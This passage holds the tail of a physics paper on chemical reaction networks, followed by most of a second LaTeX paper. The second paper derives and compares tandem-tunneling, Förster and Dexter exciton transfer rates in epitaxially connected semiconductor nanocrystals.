get complicated to solve. It would hence be very useful if this
procedure could be systematised in some way independent
of the particular CRN under study, perhaps
with the help of some of the techniques available
in the large body of work that exists on efficient
ways to truncate the moment hierarchy in CRN's \cite{Schnoerr:Survey:15}.
In \cite{Smith:LP_CRN:17}, we have provided alternate
approximation schemes (differing from moment-closure schemes)
for the FM equations, related to asymptotic expansions in the
low-$k$ and large-$k$ limit. These methods
might be applicable, even in the case when recursions like
Eq. (\ref{eq:rec_123}) and Eq. (\ref{eq:rec_two_species}) are hard
to obtain for CRN's with many species.
CRN's with non-mass-action kinetics
could also be interesting to look at \cite{Anderson:non_mass_action:16}.
Finally, though we have only concentrated on the
static properties here, the Liouvillian contains all
information on the dynamics as well, which can be investigated further,
in the spirit of \cite{Polettini:diss_def:15}.
{\it Acknowledgements}: SK would like to thank Artur Wachtel
for very useful discussions during the Nordita
program `Stochastic thermodynamics in biology' (2015). DES thanks
Nathaniel Virgo for discussions and the Stockholm University Physics Department for hospitality
while this work was being carried out. DES acknowledges support from NASA Astrobiology Institute Cycle 7 Cooperative Agreement Notice (CAN-7) award:
Reliving the History of Life: Experimental Evolution of Major Transitions.
| 2024-02-18T23:40:10.194Z | 2017-09-25T02:06:51.000Z | algebraic_stack_train_0000 | 1,528 | 6,766 |
|
proofpile-arXiv_065-7616 | \section{Results and Discussion}
Let us first formulate our results.
We show that in epitaxially connected array of NCs, the ratio between the tandem tunneling $\tau_{T}^{-1}$ and F{\"o}rster rates $\tau_{F}^{-1}$ is
\begin{equation}
\label{eq:the_answer_foster}
\frac{\tau_{T}^{-1}}{\tau_{F}^{-1}} = \left(8.7 \frac{a_{B}}{a_{0}}\right)^{4} \left(\frac{\kappa_{NC}+2\kappa}{\kappa_{NC}} \right)^{4} \left(\frac{\rho}{d}\right)^{12}.
\end{equation}
Here $a_{B} = 4\pi \hbar^{2} \varepsilon_{0} \kappa_{NC}/\sqrt{m_{e}m_{h}} e^{2}$ is the unconventional effective exciton Bohr radius, $e a_{0}$ is the dipole moment matrix element taken between the valence- and conduction-band states and $\kappa_{NC}$ is the high frequency dielectric constant of the material.
In the Table 1 we summarize our estimates of the ratio (\ref{eq:the_answer_foster}) for different NCs. We used $d = 6~\mathrm{nm}$ and $\rho= 0.2 d \simeq 1 ~\mathrm{nm}$. Values of $\kappa_{NC}$ are taken from Ref. \cite{978-3-642-62332-5}. For epitaxially connected NCs we use $\kappa=2\kappa_{NC}\rho/d$ (see Ref. \cite{dielectric_constant_touching_NC}).
The ratio (\ref{eq:the_answer_foster}) is derived for materials with an isotropic single band hole $m_{h}$ and electron $m_{e}$ masses. For most materials the spectra are more complex. Below we explain how we average the masses for these materials and also how we calculate $a_{0}$.
We see that, the tandem tunneling can be comparable with the F{\"o}rster mechanism in semiconductors like InP, CdSe where the effective mass is small.
The tandem tunneling can be more efficient in cases where the F{\"o}rster mechanism is forbidden.
For example, in indirect band gap semiconductors like Si, where $a_{0}$ is small and the F{\"o}rster mechanism is not effective, the tandem tunneling mechanism dominates.
In another situation the tandem tunneling dominates at low temperatures. Excitons can be in bright or dark spin states \cite{Efros_dark_exciton}. Only the bright exciton can hop due to the F{\"o}rster mechanism. The dark exciton has smaller energy and the dark-bright exciton splitting is of the order of a few meV. So at small temperatures an exciton is in the dark state and cannot hop by the F{\"o}rster mechanism. At the same time the tandem tunneling is not affected by a spin state of an exciton.
Dexter \cite{Dexter_transfer} suggested another exciton transfer mechanism which also is not affected by spin state of an exciton. Two electrons of two NCs exchange with each other (see Fig. \ref{fig:Scheme}c). We show below that for an array of NCs the ratio between rates for tandem tunneling and the Dexter mechanism is:
\begin{equation}
\label{eq:the_answer}
\frac{\tau_{T}^{-1}}{\tau_{D}^{-1}} = \left(\frac{\Delta_{e}\Delta_{h}}{4E_{c}^{2}}\right)^{2}.
\end{equation}
In most cases $\Delta_{e,h} \gg E_{c}$ and as one can see from Table 1 that the tandem tunneling rate is much larger than the Dexter rates with the exception of ZnO.
It is worth noting that the same ratio holds not only for epitaxially connected NCs but for NCs separated by ligands.
Of course, if NCs are separated by ligands say by distance $s$ and wave functions decay in ligands as $\exp(-s/b)$, where $b$ is the decay length of an electron outside of a NC, both rates acquire additional factor $\exp(-4s/b)$.
Also, the difference between the tandem mechanism and Dexter transfer emerges only in NCs, where $\Delta_{e,h} \gg E_{c}$.
In atoms and molecules, where essentially $E_{c} \simeq \Delta$ there is no such difference between the two mechanisms.
For epitaxially connected Si and InP NCs where the tandem tunneling is substantial these predictions can be verified in the following way.
One can transform the bright exciton to the dark one by varying magnetic field or temperature.
The exciton in the dark state cannot hop by the F{\"o}rster mechanism, and usually hops much slower \cite{energy_transport_NC_Rodina,Exciton_CdSe_H_T}.
For epitaxially connected NCs, where the tandem rate is larger than the F{\"o}rster one the exciton transfer should not be affected by magnetic field or temperature.
Let us switch to derivation of the main result. For that we first should discuss electron wave functions in epitaxially connected NCs.
\emph{Wave functions of two epitaxially connected NCs.} Below we describe the envelope wave functions in two epitaxially connected NCs. Here we present only scaling estimates and calculate numerical coefficients in the methods section. The wave functions for electrons and holes are the same, so we concentrate only on the electron.
In an isolated NC the electron wave function is:
\begin{equation}
\label{eq:psi_0}
\psi_{0}(r) = \frac{1}{\sqrt{\pi d} r} \sin \left(2\pi \frac{r}{d}\right),
\end{equation}
where $r$ is the distance from the center of the NC. We focus on two NCs shown on Fig \ref{fig:Scheme}, which touch each other by the small facet in the plane $z=0$. In this situation the wave function for an electron in the left NC $\Psi^{L}$ leaks through this small facet, so that it is finite in the plane of the facet $z=0$ and in the right NC. The derivative $\partial \Psi^{L}/\partial r$ is hardly changed by this small perturbation, so that the wave function in the plane $z=0$ acquires a finite value:
\begin{equation}
\label{eq:4}
\Psi^{L}(z=0) \simeq \rho \frac{\partial \psi_{0}}{\partial z} \simeq \frac{\rho}{d^{5/2}}.
\end{equation}
The same happens with the wave functions of an electron in the right NC $\Psi^{R}$. $\Psi^{L}$ and $\Psi^{R}$ are symmetric with respect to the plane $z=0$.
\emph{Tunneling matrix element.} We calculate the matrix element (\ref{eq:M_T}) of an electron and hole tunneling through the contact facet in the second order perturbation theory.
$E_c$ is the energy of the intermediate state, in which the electron moves to the right NC, while the hole is still in the left NC.
In other words the left NC plays the role of donor (D) and the right one the role of acceptor (A) so that intermediate state is $D^{+}A^{-}$ state.
For touching NCs the energy of $D^{+}A^{-}$ state is evaluated in the methods section and is shown to be $\xi E_{c}$, where $|\xi-1| < 0.1$.
Therefore in Eq. (\ref{eq:M_T}) and through out the paper we use $\xi=1$.
In Eq. (\ref{eq:M_T}) factor $2$ takes care about two possible orders of electron and hole hops.
Matrix elements $t_e,t_h$ for the electron and hole single particle tunneling from one NC to another can be written as \cite{landau_quantum} (see the methods section)
\begin{equation}
\label{eq:t}
t_{e,h}=\frac{\hbar^2}{m_{e,h}} \int \Psi^{L*} (r_1) \frac{\partial}{\partial z} \Psi^{L} (r_1) dS,
\end{equation}
where the integration is over the plane $z=0$.
Using Eqs. \eqref{eq:psi_0},~(\ref{eq:4}) we arrive to (\ref{eq:t_2}).
Substituting (\ref{eq:t_2}) into Eq. (\ref{eq:M_T}) we get
\begin{equation}
\label{eq:our_Dexter}
M_{T}= C_{T} \frac{\Delta_{e}\Delta_{h}}{E_{c}}\left(\frac{\rho}{d}\right)^{6},
\end{equation}
where the numerical coefficient $C_{T}=2^{7}/9\pi^{2} \simeq 1.4$ is calculated in the methods section.
Above we assumed that the energy spectra of electrons and holes are isotropic and have one band. In fact in most cases the hole energy spectrum has heavy and light band branches with masses $m_{hh}$ and $m_{hl}$ respectively. The energy of the lower state $\Delta_{h}$ can be determined with adequate accuracy if instead of a complicated valence band structure we consider a simple band ~\cite{Yassievich_excitons_Si,Holes_electrons_NCs} in which the holes have an average mass $m_{h}=3m_{hl}m_{hh}/(m_{hl}+2 m_{hh})$. For indirect band materials like Si an electron in the conduction band has an anisotropic mass in transverse $m_{et}$ and parallel $m_{ep}$ directions. The effective mass $m_{e}$, which determines the energy of the lower state $\Delta_{e}$ has a similar form $m_{e}=3m_{et}m_{ep}/(m_{et}+2 m_{ep})$. Using data for the electron and hole masses from Ref. \cite{978-3-642-62332-5} we get the values $\sqrt{m_{e}m_{h}}$ which is shown in the Table 1.
\emph{F{\"o}rster matrix element.} Now we dwell on the F{\"o}rster matrix element. It is known \cite{Delerue_Foster_NC} that the matrix element for the F{\"o}rster transfer between two touching NCs is
\begin{align}
\label{eq:M_F}
M_F & = \sqrt{\frac{2}{3}} \frac{e^{2}}{4\pi \varepsilon_{0} d^{3}} \eta a_{0}^{2}.
\end{align}
Here we assume that dipoles which interact with each other are concentrated in the center of NCs. The factor $\eta=9\kappa/(\kappa_{NC}+2\kappa)^{2}$ takes into account that the dipole-dipole interaction is screened \cite{Forster_Rodina}. The product $e a_{0}$ is the matrix element of the dipole moment between the conduction and valence band. Eqs. (\ref{eq:our_Dexter}) and (\ref{eq:M_F}) bring us to the ratio (\ref{eq:the_answer_foster}).
In order to find $a_{0}$ we note that the matrix element of dipole moment is related to the band gap $E_{g}$ of a material and the momentum matrix element $p$ as ~\cite{laser_devices_Blood}
$$a_{0}^{2} = \frac{\hbar^{4}p^{2}}{m^{2}E_{g}^{2}}.$$
According to the Kane model $p$ determines the effective electron mass \cite{Efros_review_NCs}, so we can say that
\begin{equation}
\label{eq:a0}
a_{0}^{2}=\frac{3}{4} \frac{\hbar^{2}}{E_{g}m_{e}}.
\end{equation}
The estimate for $a_{0}$ for direct gap materials is given in the Table 1.
For an indirect band gap semiconductor such as Si the dipole-dipole transition is forbidden. However, in small NCs this transition is possible due to the confinement or the phonon assistance. One can get estimate of the effective $a_{0}$ in the following way. The transfer rate for InAs is $10^{7}$ times larger than for Si \cite{Delerue_Foster_NC}, because their dielectric constants are close we assume that the difference in rates is due to $a_{0}$. Thus for Si, effective $a_{0}$ is $55$ times smaller than for InAs, which we get with the help of the Eq. (\ref{eq:a0}).
\emph{Dexter matrix element.} The physics of the Dexter transfer mechanism\cite{Dexter_transfer} involves electron tunneling, but differs from that of the tandem tunneling mechanism in the following sense.
The Dexter matrix element $M_{D}$ is calculated below in the first order perturbation theory in electron-electron interaction between two-electron wave function.
The tandem tunneling matrix element was calculated in Eq. (\ref{eq:M_T}) in the second order perturbation theory, where $t_e$ and $t_h$ are single particle transfer integrals calculated between one-electron wave functions.
Here we calculate the Dexter matrix element and show that at $\Delta \gg E_{c}$ it is much smaller than the tandem one. It is easier to consider this mechanism in the electron representation.
The Dexter exciton transfer happens due to potential exchange interaction between two electrons in NCs.
The initial state is $\Psi^{L*} (r_1) \Psi^{R}(r_{2})$ \textit{i.e.} the first electron in the conduction band of the left NC and the second electron is in the valence band of the right NC.
The final state is $\Psi^{R} (r_1) \Psi^{L} (r_2)$, \textit{i.e.} the first electron in the conduction band of the right NC and the second electron in the valence band of the left NC (see Fig. \ref{fig:Scheme} a).
The matrix element has the following form:
\begin{equation}
\label{eq:M_D}
M_D = \int \Psi^{L*} (r_1) \Psi^{R*} (r_2) V(r_{1},r_{2}) \Psi^{R} (r_1) \Psi^{L} (r_2) d^3r_1 d^3 r_2.
\end{equation}
Here $V(r_{1},r_{2})$ is the interaction energy between electrons in points $r_{1}$ and $r_{2}$, which is of the order of $E_{c}$. In general, calculating the matrix element is a difficult problem. For our case, however, a significant simplification is available because the internal dielectric constant $\kappa_{NC}$ is typically much larger than the external dielectric constant $\kappa$ of the insulator in which the NC is embedded. The large internal dielectric constant $\kappa_{NC}$ implies that the NC charge is homogeneously redistributed over the NC surface. As a result a semiconductor NC can be approximately considered as a metallic one in terms of its Coulomb interactions, namely that when electrons are in two different NCs, the NCs are neutral and there is no interaction between them and $V=0$. When electrons are in the same NC, both NCs are charged and $V=E_{c}$. Thus, we can approximate Eq. (\ref{eq:M_D}) as:
\begin{equation}
\label{eq:M_D_2}
M_D = 2 E_{c} \left(\int \Psi^{L}(r) \Psi^{R}(r) d^{3}r\right)^{2}.
\end{equation}
The integral above is equal to $2 t_{e}/\Delta_{e}$ (see methods section) and we get:
\begin{equation}
\label{eq:7}
M_D = C_{D} E_{c}\left(\frac{\rho}{d}\right)^{6},
\end{equation}
where $C_{D} = 2^{9}/9\pi^{2} \simeq 5.7$ is the numerical coefficient.
Let us compare Eqs. (\ref{eq:7}) and (\ref{eq:our_Dexter}) for matrix elements $M_D$ and $M_T$ of Dexter and tundem processes.
We see that $M_D$ is proportional to $E_c$, while $M_T$ is inverse proportional to $E_c$.
(The origin of this difference is related to the fact that in Anderson terminology \cite{Anderson_potential_kinetic_exchange} the former one describes ``potential exchange'', while the latter one describes ``kinetic exchange''.
In the magnetism theory \cite{Anderson_potential_kinetic_exchange} the former leads to ferromagnetism and the latter to antiferromagnetism).
Note that the ratio (\ref{eq:the_answer}) is inverse proportional to the fourth power of the effective mass.
As a result in semiconductors with small effective mass such as InP and CdSe the ratio of tandem and Dexter rates is very large (up to $100$).
Using Ref. \cite{dielectric_constant_touching_NC} $\kappa=2\kappa_{NC}\rho/d$ in the Table 1 we calculate the ratio for different NCs.
We see that typically the tandem tunneling rate is larger or comparable with the Dexter one.
So far we dealt only with NCs in which the quantization energy $\Delta$ is smaller than half of the semiconductor energy gap and one can use parabolic electron and hole spectra. This condition is violated in semiconductor NCs with very small effective masses $\sim 0.1 ~m$ and small energy gaps $\sim 0.2 \div 0.3$ eV such as InAs and PbSe. In these cases, the quantization energy $\Delta$ should be calculated using non-parabolic ("relativistic") linear part of the electron and hole spectra $|\epsilon| = \hbar v k$, where $v \simeq 10^{8} ~\mathrm{cm/s}$~\cite{Wise_PbSe,PbS_spectrum,PbSe_NC_spectrum_Delerue}. This gives $\Delta = 2 \pi \hbar v/d$. We show in the methods section that substitution of $\Delta_{e,h}$ in Eq. (\ref{eq:t_2}) by $\Delta/2$ leads to the correct ``relativistic'' modification of the single particle tunneling matrix element $t$ between two such NCs. Then for InAs and PbSe NCs with the same geometrical parameters as in the Table 1 we arrive at ratios $\tau^{-1}_{T}/\tau^{-1}_{D}$ as large as $1000$ (see Table 2). One can see however that inequalities (\ref{eq:condition}) are only marginally valid so that this case deserves further attention.
\begin{table}[h]
\label{tab:parameters}
\begin{tabular}{ c | c| c| c| c| c |c| c |c }
\hline
NC & $\kappa_{NC}$ & $a_{0} ~~\mathrm{\AA}$ &$ \Delta$&$\alpha \Delta$&$E_{c}$ &$t_{e}$&$\tau_{T}^{-1}/\tau_{F}^{-1}$ & $\tau_{T}^{-1}/\tau_{D}^{-1}$ \\ \hline
PbSe & 23 &25.8 &660 &33&25&2&0.1& $10^{3}$ \\
InAs & 12.3 &19.7 &660 &33&46&2&$10^{-2}$& $10^{2}$ \\
\hline
\end{tabular}
\caption{Parameters and results for ``relativistic'' NCs PbSe and InAs. As in the Table 1 we use $d=6 ~\mathrm{nm}$, $\rho=0.2 d \simeq 1 ~\mathrm{nm}$ and $\alpha=0.05$}
\end{table}
\section{Conclusion}
In this paper, we considered the exciton transfer in the array of epitaxially connected through the facets with small radius $\rho$ NCs.
After evaluation of matrix elements for F{\"o}rster and Dexter rates in such arrays we proposed an alternative mechanism of tunneling of the exciton where electron and hole tunnel in tandem through the contact facet. The tandem tunneling happens in the second order perturbation theory through the intermediate state in which the electron and the hole are in different NCs.
For all semiconductor NCs we studied except ZnO the tandem tunneling rate is much larger than the Dexter one.
The tandem tunneling rate is comparable with the F{\"o}rster one for bright excitons and dominates for dark excitons.
Therefore it determines exciton transfer at low temperatures.
For silicon NCs the tandem tunneling rate substantially exceeds the F{\"o}rster rate.
\section{Methods}
\subsection{Calculation of $M_{T}$}
\label{sec:Appendix_wave_function_t}
If two NCs are separated their 1S ground state is degenerate. When they touch each other by small facet with radius $\rho \ll d$, the degeneracy is lifted and the 1S state is split into two levels $U_{s}$ and $U_{a}$ corresponding to the electron wave functions:
\begin{equation}
\label{eq:psi_g_u}
\psi_{s,a}=\frac{1}{\sqrt{2}} [ \Psi^{L}(-z) \pm \Psi^{L}(z)],
\end{equation}
which are symmetric and antisymmetric about the plane $z=0$. The difference between two energies $U_{a}-U_{s}=2 t$, where $t$ is the overlap integral between NCs. Similarly to the problem 3 in $\S$50 of Ref. \cite{landau_quantum} we get Eq. (\ref{eq:t}).
Below we find $\Psi^{L}$ in the way which is outlined in \cite{Rayleigh_diffraction_aperure,localization_length_NC}. We look for solution in the form
\begin{equation}
\label{eq:psi_definition}
\Psi^{L}=\psi_{0}+\psi,
\end{equation}
where $\psi_{0}$ is non-zero only inside a NC. $\psi$ is the correction which is substantial only near the contact facet with the radius $\rho \ll d$ so $\nabla^{2} \psi \gg \psi \Delta_{e,h}$ and we can omit the energy term in the Schrodinger equation:
\begin{equation}
\label{eq:Laplacian}
\nabla^{2} \psi=0.
\end{equation}
Near the contact facet with $\rho \ll d$ two touching spheres can be seen as an impenetrable plane screen and the the contact facet as the aperture in the screen. The boundary conditions for $\psi$ are the following: $\psi=0$ on the screen, while in the aperture the derivative $d\Psi^{L}/dz$ is continuous:
\begin{equation}
\label{eq:psi_derivative}
\left . \frac{\partial \psi}{\partial z} \right|_{z=+0} = \left . \frac{\partial \psi_{0}}{\partial z} + \frac{\partial \psi}{\partial z} \right|_{z=-0}.
\end{equation}
As shown in Refs. \cite{Rayleigh_diffraction_aperure, localization_length_NC} $\psi$ is symmetric with respect to the plane $z=0$. As a result,
\begin{equation}
\label{eq:psi_z}
\left. \frac{\partial \psi}{\partial z} \right|_{z=+0} = -2\frac{\sqrt{\pi}}{d^{5/2}} =A.
\end{equation}
It is easy to solve the Laplace equation with such boundary condition in the oblate spheroidal coordinates $\varphi$ ,$\xi$, $\mu$, which are related with cylindrical coordinates $z$, $\rho'$, $\theta$ (see Fig.~\ref{fig:oblate}) as
\begin{figure}[ht]
\includegraphics[width=0.45\textwidth]{figure2.pdf}
\caption{\label{fig:oblate} The contact with radius $\rho$ between two spheres with diameter $d \gg \rho$ can be represented by a screen with an aperture. In oblate spheroidal coordinates the aperture corresponds to the plane $\xi=0$ and the screen corresponds to the plane $\mu=0$ }
\end{figure}
\begin{eqnarray}
\rho' & = &\rho \sqrt{(1+\xi^{2})(1-\mu^{2})} \nonumber \\
z & = &\rho \xi \mu \\
\varphi & =& \varphi \nonumber
\label{eq:relation}
\end{eqnarray}
The Laplace equation can then be rewritten \cite{9780387184302}:
\begin{equation}
\label{eq:Laplace}
\frac{\partial}{\partial \xi} (1+\xi^{2}) \frac{\partial \psi}{\partial \xi} + \frac{\partial}{\partial \mu} (1-\mu^{2}) \frac{\partial \psi}{\partial \mu}=0.
\end{equation}
The boundary conditions in this coordinates will be $\psi=0$ for $\mu=0$ ($z=0$ and $\rho'>\rho$) and for the region $\xi=0$ ($z=0$, $\rho'<\rho$)
$$
\left. \frac{\partial \psi}{\partial \xi}\right|_{\xi=0} \frac{1}{\rho \mu} = A.
$$
One can check by direct substitution that the solution at $z>0$ of the equation with these boundary conditions is:
\begin{equation}
\label{eq:solution}
\psi= \frac{2\rho A}{\pi} \mu (1-\xi \arccot \xi)
\end{equation}
Thus in the contact between two spheres $\xi=0$ ($z=0$, $\rho'<\rho$):
\begin{equation}
\label{eq:surface_psi}
\psi= \frac{4}{\sqrt{\pi}} \frac{1}{d^{3/2}} \frac{\rho}{d} \sqrt{1-\frac{\rho'^{2}}{\rho^{2}}}.
\end{equation}
Now we can calculate the integral (\ref{eq:t}) using expression for $\psi$ in the contact between two NCs (\ref{eq:surface_psi}) and arrive at Eq. (\ref{eq:t_2}).
\subsection{The energy of the intermediate state}
Here we study a cubic lattice of touching NCs with the period $d$.
For large $\kappa_{NC}$ it can be considered as the lattice of identical capacitors with capacitance $C_{0}$ connecting nearest neighbor sites.
One can immediately get that the macroscopic dielectric constant of the NC array is $\kappa=4\pi C_{0}/d$.
We calculate the energy for the intermediate state, where an electron and a hole occupy the nearest-neighbor NC, the reference point of energy being energy of all neutral NCs.
The Coulomb energy necessary to add one electron (or hole) to a neutral NC is called the charging energy $E_{e}$ .
It was shown \cite{dielectric_constant_touching_NC} that for touching NCs which are arranged in the cubic lattice this energy is:
\begin{equation}
\label{eq:chargin_energy}
E_{e}=1.59 E_{c}.
\end{equation}
We show here that the interaction energy between two nearest neighbors NC is $ E_{I}=-2\pi/3 E_{c}$, so that the energy of the intermediate state is $2E_{e}+E_{I} =\xi E_{c}$, where $\xi \simeq 1.08$.
Let us first remind the derivation of the result (\ref{eq:chargin_energy}).
By the definition the charging energy is
\begin{equation}
\label{eq:charging_energy_capacitance}
E_{e} = \frac{e^{2}}{2C},
\end{equation}
where $C$ is the capacitance of a NC immersed in the array.
It is known that the capacitance between a site in the cubic lattice made of identical capacitance $C_{0}$ and the infinity is $C=C_{0}/\beta$, $\beta \simeq 0.253$ ~\cite{PhysRevB.70.115317,Lattice_green_function}.
We see that $1/\beta$ plays the role of the effective number of parallel capacitors connecting this site to infinity. Thus we arrive at
\begin{equation}
\label{eq:charging_energy_capacitance_2}
E_{e} = \frac{e^{2}}{2C} =2\pi \beta E_{c} \simeq 1.59 E_{c}
\end{equation}
Here we also need the interaction energy between two oppositely charged nearest sites of the cubic lattice.
\begin{equation}
\label{eq:ineraction_energy}
E_{I} = -\frac{e^{2}}{2 C_{12}},
\end{equation}
where $C_{12}$ is the total capacitance between the two nearest-neighbor NCs. It is easy to get that $C_{12}=3C_{0}$, so that
\begin{equation}
\label{eq:ineraction_energy}
E_{I} = -\frac{e^{2}}{2 C_{12}} = -\frac{2\pi}{3}E_{c}.
\end{equation}
Thus we arrive at the energy of the intermediate state for the cubic lattice: $2E_{e}+E_{I} \simeq 1.08 E_{c}$, \textit{i.e.} for this case we get $\xi=1.08$.
We repeated this derivation for other lattices. We arrived at $\xi=0.96$ and $\xi=0.94$ for bcc and fcc latices of capacitors, respectively.
\subsection{Calculation of $M_{D}$}
\label{sec:Dexter}
One can calculate the integral (\ref{eq:M_D_2}) in the following way. $\Psi^{R}$ in the left NC can be written as $\psi$. We start from the second Green identity for functions $\Psi^{L}$ and $\psi$:
\begin{equation}
\label{eq:Green_identity}
\int d^{3}r (\psi \nabla^{2} \Psi^{L} - \Psi^{L} \nabla^{2} \psi ) = \int dS (\psi \nabla \Psi^{L} - \Psi^{L} \nabla \psi),
\end{equation}
Because $\psi$ satisfies the Eq. (\ref{eq:Laplacian}) and $\Psi^{L}$ is zero on the surface of a NC except the contact facet, where it is equal to $\psi$ we get:
$$ \int \psi(r) \Psi^{L}(r) d^{3}r = \frac{2t}{\Delta} $$
\subsection{Non-parabolic band approximation}
Below we use non-parabolic ``relativistic'' Kane approach ~\cite{PbS_spectrum}. Namely we assume that the wave function $\psi_{0}$ of an electron and hole in the ground state of the isolated spherical NC satisfies Klein-Gordon equation:
\begin{equation}
\label{eq:KG}
-\hbar^{2}v^{2} \Delta \psi_{0}+m^{*2}v^{4}\psi_{0}=E^{2}\psi_{0}.
\end{equation}
This approximation works well for the ground state of an electron and hole~\cite{PbS_spectrum}. The energy spectrum is:
\begin{equation}
\label{eq:spectrum}
E(k)=\pm\sqrt{m^{*2}v^{4}+\hbar^{2}v^{2}k^{2}}.
\end{equation}
One can immediately see that the bulk band gap $E_{g}=2m^{*}v^{2}$. The solution of the equation (\ref{eq:KG}) for spherical isolated NC is the same as in the parabolic band approximation (see Eq. (\ref{eq:psi_0})). The kinetic energy $\Delta$ becomes:
\begin{equation}
\label{eq:Delta_relativistic}
\Delta=\sqrt{m^{*2}v^{4}+\hbar^{2}v^{2}\left(\frac{2\pi}{d}\right)^{2}}-m^{*}v^{2}.
\end{equation}
Let us now concetrate on the expression for $t$. If two NCs are separated their 1S ground state is degenerate. When they touch each other by small facet with radius $\rho \ll d$, the degeneracy is lifted and the 1S state is split into two levels $U_{s}$ and $U_{a}$ corresponding to the electron wave functions:
\begin{equation}
\label{eq:psi_g_u}
\psi_{s,a}=\frac{1}{\sqrt{2}} [ \Psi^{L}(-z) \pm \Psi^{L}(z)],
\end{equation}
which are symmetric and antisymmetric about the plane $z=0$. The difference between two energies $U_{a}-U_{s}=2 t$, where $t$ is the overlap integral between NCs. Similarly to the problem 3 in $\S$50 of Ref. \cite{landau_quantum} we use that $\psi_{s}$ satisfies the Eq. (\ref{eq:KG}) with the energy $U_{s}$ and $\Psi^{L}$ satisfies the same equation with the energy $E_{L}$. As a result we get the difference:
\begin{equation}
\label{eq:difference}
E^{2}_{L}-U^{2}_{s} = \hbar^{2} c^{2} \int \left(\Psi_{L}\Delta \psi_{s} - \psi_{s} \Delta \Psi_{L} \right) dV \left( \int \psi_{s} \Psi_{L} dV \right)^{-1}
\end{equation}
Repeating the same step for $\psi_{a}$ we arrive at:
\begin{equation}
\label{eq:t_resistivity}
t=(U_{a}^{2}-U_{s}^{2}) /4 =\frac{\hbar^{2}v^{2}}{U_{s}} \int \Psi^{L} \frac{\partial \Psi^{L}}{\partial z} dS.
\end{equation}
One can check that this expression at $m^{*}v^{2} \gg \hbar v k$ leads to (\ref{eq:t}).
For $m*=0$ we get:
\begin{equation}
\label{eq:t_r}
t = \frac{\hbar v d}{2\pi} \int \Psi^{L} \frac{\partial \Psi^{L}}{\partial z} dS.
\end{equation}
Using the same approach for the calculation of the integral as in S1 we get:
\begin{equation}
\label{eq:t_R}
t=\frac{4}{3\pi} \Delta \left(\frac{\rho}{d}\right)^{3}
\end{equation}
In that case the Eq. (\ref{eq:the_answer_foster}) for the ratio tandem and F{\"o}rster rates can be written as:
\begin{equation}
\label{eq:Tandem_forster}
\frac{\tau_{T}^{-1}}{\tau_{F}^{-1}}=3.7 \left(\frac{\hbar v}{e^{2}}\right)^{4} \left(\frac{d}{a_{0}}\right)^{4} (\kappa+2\kappa_{NC})^{4} \left(\frac{\rho}{d}\right)^{12}.
\end{equation}
and the ratio between tandem and Dexter rates is:
\begin{equation}
\label{eq:Tandem_dexter}
\frac{\tau_{T}^{-1}}{\tau_{D}^{-1}}=\frac{\pi^{4}}{2^{4}} \left(\frac{\hbar v}{e^{2}}\right)^{4} \kappa_{NC}^{4}.
\end{equation}
Eqs. (\ref{eq:Tandem_forster}) and (\ref{eq:Tandem_dexter}) are used to calculate the ratio in the Table 2.
\section{Acknowledgement}
We are grateful to A. V. Chubukov, P. Crowell, Al. L. Efros, H. Fu, R. Holmes, A. Kamenev, U. R. Kortshagen, A. V. Rodina, I. Rousochatzakis, M. Sammon, B. Skinner, M.V. Voloshin, D. R. Yakovlev and I. N. Yassievich for helpful discussions. This work was supported primarily by the National Science Foundation through the University of Minnesota MRSEC under Award No. DMR-1420013.
\providecommand{\latin}[1]{#1}
\providecommand*\mcitethebibliography{\thebibliography}
\csname @ifundefined\endcsname{endmcitethebibliography}
{\let\endmcitethebibliography\endthebibliography}{}
\begin{mcitethebibliography}{64}
\providecommand*\natexlab[1]{#1}
\providecommand*\mciteSetBstSublistMode[1]{}
\providecommand*\mciteSetBstMaxWidthForm[2]{}
\providecommand*\mciteBstWouldAddEndPuncttrue
{\def\unskip.}{\unskip.}}
\providecommand*\mciteBstWouldAddEndPunctfalse
{\let\unskip.}\relax}
\providecommand*\mciteSetBstMidEndSepPunct[3]{}
\providecommand*\mciteSetBstSublistLabelBeginEnd[3]{}
\providecommand*\unskip.}{}
\mciteSetBstSublistMode{f}
\mciteSetBstMaxWidthForm{subitem}{(\alph{mcitesubitemcount})}
\mciteSetBstSublistLabelBeginEnd
{\mcitemaxwidthsubitemform\space}
{\relax}
{\relax}
\bibitem[Shirasaki \latin{et~al.}(2012)Shirasaki, Supran, Bawendi, and
Bulovic]{ki_Supran_Bawendi_Bulovic_2012}
Shirasaki,~Y.; Supran,~G.~J.; Bawendi,~M.~G.; Bulovic,~V. Emergence of
Colloidal Quantum-Dot Light-Emitting Technologies. \emph{Nat. Photonics}
\textbf{2012}, \emph{7}, 13--23\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Liu \latin{et~al.}(2009)Liu, Holman, and
Kortshagen]{Kortshagen_Si_solar_cell}
Liu,~C.-Y.; Holman,~Z.~C.; Kortshagen,~U.~R. Hybrid Solar Cells from {P3HT} and
Silicon Nanocrystals. \emph{Nano Lett.} \textbf{2009}, \emph{9},
449--452\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Gur \latin{et~al.}(2005)Gur, Fromer, Geier, and
Alivisatos]{gur_air-stable_2005}
Gur,~I.; Fromer,~N.~A.; Geier,~M.~L.; Alivisatos,~A.~P. Air-Stable
All-Inorganic Nanocrystal Solar Cells Processed from Solution. \emph{Science}
\textbf{2005}, \emph{310}, 462--465\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Yang \latin{et~al.}(2015)Yang, Zheng, Cao, Titov, Hyvonen, Manders,
Xue, Holloway, and Qian]{LED_Yang_2015}
Yang,~Y.; Zheng,~Y.; Cao,~W.; Titov,~A.; Hyvonen,~J.; Manders,~J.~R.; Xue,~J.;
Holloway,~P.~H.; Qian,~L. High-Efficiency Light-Emitting Devices Based on
Quantum Dots with Tailored Nanostructures. \emph{Nat. Photonics}
\textbf{2015}, \emph{9}, 259-266\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Gong \latin{et~al.}(2016)Gong, Yang, Walters, Comin, Ning, Beauregard,
